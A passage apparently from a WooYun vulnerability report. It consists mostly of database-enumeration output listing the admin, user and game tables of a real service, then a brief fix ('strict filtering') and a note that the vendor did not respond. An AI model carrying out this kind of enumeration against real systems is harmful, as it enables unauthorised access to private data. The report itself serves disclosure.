| license_prodcheck |
| license_prodcheck_dialog |
| license_prodcheck_gallery |
| license_prodcheck_step |
| license_prodclass |
| license_prodtype |
| license_product |
| license_role |
| license_role_access |
| license_role_group |
| license_role_module |
| license_role_nav |
| license_role_node |
| license_step |
| license_user |
| license_user_field |
| license_user_group |
| license_user_log |
| license_user_role_access |
| license_user_role_group |
| license_user_role_module |
| license_user_role_nav |
| license_user_role_node |
+---------------------------------------+
Database: admin
[32 tables]
+---------------------------------------+
| box_check_boxid |
| box_count |
| box_getitemsum |
| box_itemlock |
| daily_report |
| manage_admin |
| manage_adminlog |
| manage_adminmenu |
| manage_adminmessage |
| manage_babi |
| manage_blogcount |
| manage_config |
| manage_controller |
| manage_crontab |
| manage_group |
| manage_ip |
| manage_ipaddress |
| manage_itemlog |
| manage_loginlog |
| manage_members |
| manage_menu |
| manage_notice |
| manage_registernum |
| manage_serverlist |
| manage_serverlogin |
| manage_sfstype |
| manage_systemlog |
| manage_systemnews |
| manage_table |
| newtb |
| rsync_file |
| rsync_ipaddress |
+---------------------------------------+
Database: HeziBasic
[50 tables]
+---------------------------------------+
| arena_info |
| arena_top_list |
| arena_winner_list |
| box_action_detail_log |
| box_area_weather |
| box_check_point |
| box_check_point_mission_relation |
| box_honour_level |
| box_identity_detail |
| box_identity_info |
| box_market_item_filter |
| box_movie_clip |
| box_mystic_gift |
| box_raiders_check_point |
| box_raiders_mission |
| box_sanguo |
| box_scene |
| box_scene_area |
| box_scene_type |
| ext_shake_info |
| identity_medal_relation |
| identity_reward_list |
| mall_advice |
| mall_goods |
| mall_goods_append |
| mall_goods_item |
| mall_goods_log |
| mall_goods_type |
| mall_log_total |
| medal_info |
| mission_fresh_info |
| mission_info |
| mission_item |
| mission_npc_info |
| mission_relation |
| mission_type |
| mission_xml |
| mystic_gift_answer |
| mystic_gift_question |
| mystic_gift_question_answer_relation |
| mystic_gift_question_relation |
| party_base_config |
| party_info |
| party_scene_relation |
| party_time_config |
| sso_qh_box_relation |
| sso_qq_box_relation |
| system_user_blacklist |
| temp_box_unusual_out_log |
| temp_box_usual_out_log |
+---------------------------------------+
Database: HeziPlant
[209 tables]
+---------------------------------------+
| box_plant_0 |
| box_plant_1 |
| box_plant_10 |
| box_plant_11 |
| box_plant_12 |
| box_plant_13 |
| box_plant_14 |
| box_plant_15 |
| box_plant_16 |
| box_plant_17 |
| box_plant_18 |
| box_plant_19 |
| box_plant_2 |
| box_plant_3 |
| box_plant_4 |
| box_plant_5 |
| box_plant_6 |
| box_plant_7 |
| box_plant_8 |
| box_plant_9 |
| box_plant_farm_0 |
| box_plant_farm_1 |
| box_plant_farm_10 |
| box_plant_farm_11 |
| box_plant_farm_12 |
| box_plant_farm_13 |
| box_plant_farm_14 |
| box_plant_farm_15 |
| box_plant_farm_16 |
| box_plant_farm_17 |
| box_plant_farm_18 |
| box_plant_farm_19 |
| box_plant_farm_2 |
| box_plant_farm_3 |
| box_plant_farm_4 |
| box_plant_farm_5 |
| box_plant_farm_6 |
| box_plant_farm_7 |
| box_plant_farm_8 |
| box_plant_farm_9 |
| box_plant_farmbg_0 |
| box_plant_farmbg_1 |
| box_plant_farmbg_10 |
| box_plant_farmbg_11 |
| box_plant_farmbg_12 |
| box_plant_farmbg_13 |
| box_plant_farmbg_14 |
| box_plant_farmbg_15 |
| box_plant_farmbg_16 |
| box_plant_farmbg_17 |
| box_plant_farmbg_18 |
| box_plant_farmbg_19 |
| box_plant_farmbg_2 |
| box_plant_farmbg_3 |
| box_plant_farmbg_4 |
| box_plant_farmbg_5 |
| box_plant_farmbg_6 |
| box_plant_farmbg_7 |
| box_plant_farmbg_8 |
| box_plant_farmbg_9 |
| box_plant_fruit_0 |
| box_plant_fruit_1 |
| box_plant_fruit_10 |
| box_plant_fruit_11 |
| box_plant_fruit_12 |
| box_plant_fruit_13 |
| box_plant_fruit_14 |
| box_plant_fruit_15 |
| box
修复方案:
严格过滤
版权声明:转载请注明来源 qqdaxingxing@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝